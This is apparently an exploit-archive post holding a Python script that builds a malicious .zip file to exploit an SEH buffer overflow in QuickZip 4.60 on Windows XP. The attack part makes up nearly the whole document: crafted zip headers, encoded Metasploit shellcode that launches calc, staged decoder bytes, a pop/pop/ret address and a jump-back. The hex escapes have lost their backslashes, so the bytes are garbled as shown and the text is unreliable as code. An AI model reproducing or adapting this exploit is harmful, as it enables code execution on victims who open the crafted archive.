QuickZip 4.x (.zip) Buffer Overflow Exploit #2
Posted on 09 March 2010
============================================== QuickZip 4.x (.zip) Buffer Overflow Exploit #2 ============================================== #!/usr/bin/python # ############################################################################### # Exploit Title : QuickZip 4.x (.zip) Buffer Overflow Exploit #2 # Date : 9/3/2010 # Original author : corelanc0d3r & mr_me # Second Exploit : Dz_attacker (dz_attacker[at]hotmail[dot]fr # Software Link : http://www.quickzip.org/downloads.html # Version : 4.60 # OS : Windows # Tested on : XP SP3 En # Type of vuln : SEH # Greetz to : Corelan Security Team # ############################################################################### header1 = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00xe4x0fx00x00x00") header2 = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00" "x24x00x00x00x00x00x00x00") header3 = ("x50x4Bx05x06x00x00x00x00x01x00x01x00" "x12x10x00x00x02x10x00x00x00x00") # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode=( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44" "x42x50x42x50x42x30x4bx38x45x54x4ex43x4bx38x4ex57" "x45x50x4ax57x41x50x4fx4ex4bx58x4fx54x4ax31x4bx38" "x4fx35x42x42x41x30x4bx4ex49x34x4bx48x46x43x4bx48" "x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c" "x46x47x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx43x46x35x46x42x46x30x45x57x45x4ex4bx58" "x4fx35x46x52x41x30x4bx4ex48x56x4bx58x4ex30x4bx44" "x4bx38x4fx55x4ex41x41x30x4bx4ex4bx48x4ex51x4bx38" "x41x50x4bx4ex49x38x4ex55x46x32x46x50x43x4cx41x33" "x42x4cx46x36x4bx38x42x44x42x43x45x58x42x4cx4ax57" "x4ex50x4bx38x42x44x4ex30x4bx48x42x47x4ex51x4dx4a" "x4bx38x4ax36x4ax50x4bx4ex49x50x4bx38x42x38x42x4b" "x42x50x42x30x42x50x4bx58x4ax56x4ex33x4fx35x41x53" "x48x4fx42x56x48x55x49x58x4ax4fx43x58x42x4cx4bx57" "x42x45x4ax56x50x37x4ax4dx44x4ex43x47x4ax56x4ax49" "x50x4fx4cx38x50x30x47x45x4fx4fx47x4ex43x56x41x36" "x4ex36x43x46x42x30x5a") print "[+] Building PoC.." junk = "x44"*302 code = "x2Dx6Ex45x45x45" #SUB EAX,4545456E code += "x2Dx6Dx55x55x55" #SUB EAX,5555556D code += "x2Dx78x69x52x65" #SUB EAX,65526978 sploit = "x41"*200 sploit += code #First stage shellcode sploit += "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIm8taRUGsUQTJA" sploit += "x41"*14 sploit += "x76xffx42x42" #jump back 94 bytes sploit += "x1bx24x70x00" #0x0070241b p/p/r sploit += shellcode sploit += "x44"*(4064-len(junk+shellcode)) sploit += ".exe" payload = header1 payload += sploit payload += header2 payload += sploit payload += header3 mefile = open('dz.zip','w'); mefile.write(payload); mefile.close() print "[+] Exploit complete!" # ~ - [ [ : Inj3ct0r : ] ]